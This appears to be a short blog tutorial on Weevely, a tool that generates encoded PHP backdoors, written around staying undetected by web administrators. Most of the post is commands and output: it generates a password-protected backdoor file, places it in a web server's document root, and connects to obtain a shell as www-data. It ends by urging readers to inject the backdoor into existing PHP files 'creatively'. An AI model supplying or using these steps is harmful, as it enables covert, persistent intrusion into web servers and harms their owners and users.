Silent Backdoor with Weevely

Ever think to gain access to your backdoor undetected? Well, maybe not all web administrators examine their php files? Weevely is the answer. Just follow these actions (I was doing this on Backtrack 5):

[email protected]:~# >cd /pentest/backdoors/web/weevely
[email protected]:/pentest/backdoors/web/weevely#./main.py -g -p bD_p4ss -o bd.php

Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

+ Backdoor file 'bd.php' created with password 'bD_p4ss'.
[email protected]:/pentest/backdoors/web/weevely#

Where:
-p = your password to access the backdoor
-g = generate a new encrypted php file (it doesn’t actually encrypt the file, they encode it)
-o = specify your output file

Now you have a new “encrypted” php file called bd.php. So how does it work?
You can put this script on the webserver document root.

Now take a look what will it be when i put the script and accessed it.

[email protected]:/pentest/backdoors/web/weevely# ./main.py -t -u http://10.10.10.10/bd.php -p bD_p4ss

Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

+ Using method 'system()'.
+ Retrieving terminal basic environment variables .

[[email protected] /var/www] id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[[email protected] /var/www] pwd
/var/www
[[email protected] /var/www]

Voila! we’ve got a non-interactive shell!
Weevely can also be easily deployed inside any php file, but you should pay attention on where this script will be injected, be creative 🙂

Leave a Reply

Your email address will not be published. Required fields are marked *